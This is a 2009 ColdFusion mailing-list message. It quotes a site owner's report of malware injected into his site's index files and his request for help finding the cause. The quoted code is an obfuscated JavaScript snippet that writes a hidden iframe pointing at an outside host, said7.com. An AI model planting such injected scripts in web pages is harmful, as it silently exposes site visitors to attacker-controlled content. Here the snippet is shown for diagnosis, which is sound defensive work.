Thank you guys. I guess I searched everywhere but House of Fusion. I shoulda known.
Terry -----Original Message----- From: Terry Troxel [mailto:[email protected]] Sent: Wednesday, April 15, 2009 7:13 PM To: cf-talk Subject: [SPAM-HIGH] OT Malware on a CF Site Has anyone seen anything like this written to any of your sites? <script><!-- var applstrna0 = "<if"; var applstrna1 = "rame src=http://said7";; var applstrna2 = ".com/bb/faq.htm"; var applstrna3 = " width=100 height=0></i"; var applstrna4 = "frame>"; document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); //--></script> The file this was written to is an index.cfm file that has been on the site for over 8 years. The only line that was in this file was a cflocation to redirect to another folder. The index.html file that this file redirects to is rewritten by CF every time the site admin makes a change. THAT index.html file had the same script written to the very bottom of that file as well, but when I made a change and it was rewritten the script is gone. I can then assume something other then my CF or any SQL injections are not the culprit. I have been unable to contact the hosting company to check their server and I have also been unable to find anything in my Googling to give me any clues as to a cause and a cure. Any help would be greatly appreciated. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321641 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
